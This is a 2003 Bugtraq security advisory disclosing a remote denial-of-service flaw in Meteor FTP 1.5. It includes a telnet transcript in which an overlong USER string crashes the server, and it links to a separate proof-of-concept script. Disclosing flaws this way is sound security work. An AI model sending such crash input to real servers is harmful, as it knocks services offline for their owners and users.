Remote denial of service vulnerability in Meteor FTP Version 1.5

From: Zee (zerash_at_evicted.org)
Date: 08/09/03

  • Next message: Mike Caudill: "Re: Cisco CSS 11000 Series DoS"
    Date: Sat, 9 Aug 2003 13:31:13 -0400 (EDT)
    To: bugtraq@securityfocus.com
    
    
    

    www.evicted.org
    zerash@evicted.org
    August 8, 2003

    Meteor FTP Version 1.5 Remote Denial of Service Vulnerability

    1. Introduction
    ----------------
    Meteor FTP is a personal ftp server that runs on Windows98/ME/2K/XP.

    2. Vulnerability
    -----------------
    A vulnerability exists in Meteor FTP Version 1.5, which allows any
    malicious user to remotely cause a denial of service against the ftp
    server.

    By connecting to the Meteor FTP server and issuing USER followed by large
    amounts of data, the ftp server will crash.

    3. Example
    -----------
    Proof of concept exploit (meteordos.pl) is included in the attachment.

    root@openwire # telnet 192.168.1.14 21
    Trying 192.168.1.14...
    Connected to 192.168.1.14.
    Escape character is '^]'.
    220 Service ready for new user
    USER
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    530 Not logged on
    QUIT
    Connection closed by foreign host.
    root@openwire # telnet 192.168.1.14 21
    Trying 192.168.1.14...
    Connected to 192.168.1.14.
    Escape character is '^]'.
    USER anonymous
    QUIT
    telnet> quit
    Connection closed.

    At this point the server has completely froze up. On the server side, the
    Meteor FTP spits out a dialog :

    "Error: Access Violation at 0x77FCC992 (Tried to write 0x25252525),
    program terminated."

    By clicking "OK", Meteor FTP terminates.

    4. Vendor status
    ----------------
    Vendor has been notified, waiting for response...

    5. Credits
    -----------
    Vulnerability & code by zerash
    You can view this advisory at :
    http://www.evicted.org/projects/writings/mftpadvisory.txt
    You can view the exploit at :
    http://www.evicted.org/projects/code/meteordos.pl

    6. Contact
    -----------
    Please send suggestions, updates, and comments to :
    zerash@evicted.org
    http://www.evicted.org

    
    



  • Next message: Mike Caudill: "Re: Cisco CSS 11000 Series DoS"